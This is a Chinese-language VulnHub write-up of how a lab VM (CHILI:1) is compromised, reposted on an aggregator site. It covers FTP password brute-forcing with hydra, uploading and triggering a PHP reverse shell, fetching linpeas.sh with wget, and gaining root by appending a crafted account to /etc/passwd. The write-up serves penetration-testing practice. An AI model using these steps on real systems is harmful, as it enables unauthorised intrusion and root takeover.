VulnHub渗透测试实战靶场 - CHILI:1

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - CHILI:1相关的知识,希望对你有一定的参考价值。

环境下载

CHILI:1靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.138
  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65535 192.168.246.138,发现开放了 21、80 两个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.138

漏洞挖掘

  • 扫描 web 目录没有发现什么有用信息,尝试匿名登录 ftp,发现无法登录
  • F12 查看页面源码,发现可疑信息
  • 尝试利用 Chilichile 作为 ftp 用户名,利用 hydra 爆破密码,得到用户名/密码:chile:a1b2c3d4
hydra -L user.txt -P rockyou.txt -f -V 192.168.246.138 ftp 

getshell

  • 用爆破得到的用户名/密码登录 ftp
  • 切换到网站目录 /var/www/html,发现可读可写可执行的 .nano 目录
  • 利用 put 命令,尝试上传 shell 到 .nano 目录中,这里可以直接利用 Kali 自带的 php-shell,修改 $ip$port
cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop
  • shell 文件加权限
chmod +x php-reverse-shell.php
chmod 777 php-reverse-shell.php
  • 起一个 nc 监听,访问 http://192.168/246/138/.nano/php-reverse-shell.php,成功接收到反弹的 shell,并执行命令 SHELL=/bin/bash script -q /dev/null 获得一个交互式 shell

提权

  • 这里借用一个下载辅助提权脚本工具,下载链接,先将该工具上传到网站上
python2 -m SimpleHTTPServer 8888
wget http://192.168.246.129/linpeas.sh
  • linpeas.sh 赋予执行权限后,执行 linpeas.sh
chmod +x linpeas.sh
chmod 777 linpeas.sh
  • 发现了利用的文件为 passwd 文件,可以自己写一个 root 权限的空密码账号进去,再用 passwd 写入密码来进行提权
  • 利用 perl 脚本语言,执行 crypt 模块,将 H3rmesk1t 加密字符串输出
/usr/bin/perl -le 'print crypt("H3rmesk1t","H3rmesk1t")'
  • 将 H3rmesk1t 账户信息写入到 /etc/passwd
echo "H3rmesk1t:H3uwEyrUn4dnU:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
  • 切换到用户 H3rmesk1t 即可获得 root 权限

以上是关于VulnHub渗透测试实战靶场 - CHILI:1的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场 - DevContainer:1

VulnHub渗透测试实战靶场 - LAZYSYSADMIN: 1

VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

VulnHub渗透测试实战靶场 - Bulldog: 1

VulnHub渗透测试实战靶场 - Tomato:1